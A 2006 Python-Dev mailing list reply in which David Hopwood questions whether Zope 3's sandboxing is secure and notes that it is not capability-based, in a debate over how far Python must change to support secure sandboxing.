[Python-Dev] new security doc using object-capabilities
David Hopwood
david.nospam.hopwood at blueyonder.co.uk
Mon Jul 24 00:07:25 CEST 2006
Phillip J. Eby wrote:
> At 01:00 PM 7/23/2006 -0700, Brett Cannon wrote:
>
>>I obviously don't want to change the feel of Python, but if I have to
>>remove the constructor for code objects to prevent evil bytecode or
>>__subclasses__() from object to prevent poking around stuff, then so be
>>it. For this project, security is [trumping] backwards-compatibility when
>>the latter is impossible in order to have the former. I will obviously
>>try to minimize it, but something that works at such a basic level of the
>>language is just going to require some changes for it to work.
>
> Zope 3's sandboxing machinery manages to handle securing these things
> without any language changes. So, declaring it "impossible" to manage
> without backward compatibility seems inappropriate, or at least
> incorrect.
... if Zope's sandboxing is secure. I haven't done a security review of it,
but your argument assumes that it is.
In any case, Zope's sandboxing is not capability-based.
--
David Hopwood <david.nospam.hopwood at blueyonder.co.uk>
More information about the Python-Dev
mailing list